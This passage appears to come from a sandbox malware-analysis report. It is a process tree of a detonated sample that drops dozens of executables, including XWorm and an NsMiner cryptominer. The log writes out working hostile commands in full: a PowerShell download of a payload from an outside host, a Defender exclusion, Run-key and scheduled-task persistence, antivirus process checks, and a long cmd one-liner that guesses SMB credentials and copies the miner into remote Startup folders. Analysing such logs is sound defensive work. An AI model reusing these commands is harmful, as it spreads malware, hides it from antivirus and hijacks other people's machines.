C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"3⤵
- Executes dropped EXE
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"3⤵
- Executes dropped EXE
PID:4808
-
-
C:\Users\Admin\AppData\Local\Temp\a\333.exe"C:\Users\Admin\AppData\Local\Temp\a\333.exe"3⤵
- Executes dropped EXE
PID:900
-
-
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\a\test12.exe"C:\Users\Admin\AppData\Local\Temp\a\test12.exe"3⤵
- Executes dropped EXE
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\a\test6.exe"C:\Users\Admin\AppData\Local\Temp\a\test6.exe"3⤵
- Executes dropped EXE
PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\a\test14.exe"C:\Users\Admin\AppData\Local\Temp\a\test14.exe"3⤵
- Executes dropped EXE
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"3⤵
- Executes dropped EXE
PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\a\test9.exe"C:\Users\Admin\AppData\Local\Temp\a\test9.exe"3⤵
- Executes dropped EXE
PID:2500
-
-
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"3⤵
- Executes dropped EXE
PID:1028
-
-
C:\Users\Admin\AppData\Local\Temp\a\test19.exe"C:\Users\Admin\AppData\Local\Temp\a\test19.exe"3⤵
- Executes dropped EXE
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\a\test10.exe"C:\Users\Admin\AppData\Local\Temp\a\test10.exe"3⤵
- Executes dropped EXE
PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"3⤵
- Executes dropped EXE
PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\a\test23.exe"C:\Users\Admin\AppData\Local\Temp\a\test23.exe"3⤵
- Executes dropped EXE
PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\a\test5.exe"C:\Users\Admin\AppData\Local\Temp\a\test5.exe"3⤵
- Executes dropped EXE
PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\a\test11.exe"C:\Users\Admin\AppData\Local\Temp\a\test11.exe"3⤵
- Executes dropped EXE
PID:1944
-
-
C:\Users\Admin\AppData\Local\Temp\a\test20.exe"C:\Users\Admin\AppData\Local\Temp\a\test20.exe"3⤵
- Executes dropped EXE
PID:4516
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"3⤵
- Executes dropped EXE
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\a\test16.exe"C:\Users\Admin\AppData\Local\Temp\a\test16.exe"3⤵
- Executes dropped EXE
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\a\test13.exe"C:\Users\Admin\AppData\Local\Temp\a\test13.exe"3⤵
- Executes dropped EXE
PID:1256
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"3⤵
- Executes dropped EXE
PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\a\test15.exe"C:\Users\Admin\AppData\Local\Temp\a\test15.exe"3⤵
- Executes dropped EXE
PID:4912
-
-
C:\Users\Admin\AppData\Local\Temp\a\test18.exe"C:\Users\Admin\AppData\Local\Temp\a\test18.exe"3⤵
- Executes dropped EXE
PID:1912
-
-
C:\Users\Admin\AppData\Local\Temp\a\test21.exe"C:\Users\Admin\AppData\Local\Temp\a\test21.exe"3⤵
- Executes dropped EXE
PID:708
-
-
C:\Users\Admin\AppData\Local\Temp\a\test22.exe"C:\Users\Admin\AppData\Local\Temp\a\test22.exe"3⤵
- Executes dropped EXE
PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\a\test8.exe"C:\Users\Admin\AppData\Local\Temp\a\test8.exe"3⤵
- Executes dropped EXE
PID:2784
-
-
C:\Users\Admin\AppData\Local\Temp\a\test7.exe"C:\Users\Admin\AppData\Local\Temp\a\test7.exe"3⤵
- Executes dropped EXE
PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"3⤵
- Executes dropped EXE
PID:3164
-
-
C:\Users\Admin\AppData\Local\Temp\a\test17.exe"C:\Users\Admin\AppData\Local\Temp\a\test17.exe"3⤵
- Executes dropped EXE
PID:424
-
-
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2316
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\win.exe"C:\Users\Admin\AppData\Local\Temp\a\win.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3888 -
C:\Windows\SysWOW64\route.exeroute print4⤵PID:1716
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.127.0.14⤵
- Network Service Discovery
PID:2992
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:684 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:5048
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:1160
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:1848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4232 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 3686⤵
- Program crash
PID:1136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2260
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF742.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4336 -
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"4⤵
- Executes dropped EXE
PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd4⤵PID:2680
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1236
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:896
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:4752
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:2552
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 294425⤵PID:5088
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l5⤵PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2704 -
C:\Windows\explorer.exeexplorer.exe7⤵
- Suspicious use of FindShellTrayWindow
PID:2124 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4360
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"8⤵PID:3100
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:2036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"3⤵
- Executes dropped EXE
PID:4712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵PID:2096
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- Kills process with taskkill
PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵
- Executes dropped EXE
PID:4496
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
PID:3900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:2808
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- Kills process with taskkill
PID:4216
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵
- Executes dropped EXE
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ5⤵PID:4504
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵
- Adds Run key to start application
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:1820
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵PID:1596
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:428
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0005⤵
- Power Settings
PID:3604 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 06⤵
- Power Settings
PID:2696
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 06⤵
- Power Settings
PID:4172
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:2668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1805& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
- NTFS ADS
PID:5144 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:4076 -
C:\Windows\SysWOW64\net.exenet view7⤵
- Discovers systems in the same network
PID:2688
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵PID:3916
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:5440
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "6⤵
- System Location Discovery: System Language Discovery
PID:5196 -
C:\Windows\SysWOW64\net.exenet view \\10.127.0.17⤵
- Discovers systems in the same network
PID:1112
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:5572
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5840
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:700 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5972
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5984
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1880
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3832
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:5188 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2404
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:5180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4800
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4644
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3468
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:3712
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "6⤵PID:2532
-
